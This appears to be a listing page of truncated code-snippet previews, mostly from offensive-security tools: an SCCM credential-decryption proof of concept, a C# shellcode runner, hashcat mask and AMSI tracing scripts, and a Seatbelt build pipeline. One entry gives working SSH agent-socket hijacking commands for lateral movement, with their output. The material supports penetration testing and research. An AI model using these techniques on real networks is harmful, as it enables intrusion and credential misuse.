| #!/bin/bash | |
| # hashcat mask generator | |
| # by @singe | |
| infile="$1" | |
| outfile="$1.freq.masks" | |
| outfile2="$1.length.masks" | |
| tmp=$(mktemp) |
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
| /* | |
| Receiver board sketch | |
| */ | |
| #include <RCSwitch.h> | |
| #include "output.h" | |
| #define LED 2 | |
| int buttonA = 952424; |
| // IMPORTANT NOTE: | |
| // It seems like when this is compiled with C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, the crash is handled more gracefully than v3.5. | |
| // So you'll have to find another way to cause an _unexpected_ crash to use with v4.0.30319. | |
| //Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe .\RecoveryCallbackToShellcode.cs | |
| //Usage: .\RecoveryCallbackToShellcode.exe <path to shellcode> | |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; |
| """ | |
| drcov version 3 isn't supported by lighthouse :( | |
| convert drcov version 3 with module table version 5 to drcov version 2 | |
| with module table version 2 so lighthouse will eat it! | |
| """ | |
| import sys | |
| import re | |
| # Author: Matt Graeber | |
| # Company: Red Canary | |
| # To start a trace, run the following from an elevated command prompt: logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
| # To stop the trace, run the following: logman stop AMSITrace -ets | |
| # Example usage: Get-AMSIEvent -Path .\AMSITrace.etl | |
| function Get-AMSIEvent { | |
| param ( |
| #!/usr/bin/python3 | |
| # Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8 | |
| # pip install simplejson | |
| import simplejson | |
| import sys | |
| def splitfile(file_name, object_limit): | |
| print(f"[*] Loading {file_name}") | |
| with open(file_name) as f: | |
| data = simplejson.load(f) |
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
VB6 and VBA come with no support for function pointers.
Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.
These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.
As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.
| @Library('ci-jenkins-common') _ | |
| // Jenkins build pipeline (declarative) | |
| // Project: Seatbelt | |
| // URL: https://github.com/GhostPack/Seatbelt | |
| // Author: @tifkin_/@harmj0y | |
| // Pipeline Author: harmj0y | |
| def gitURL = "https://github.com/GhostPack/Seatbelt" |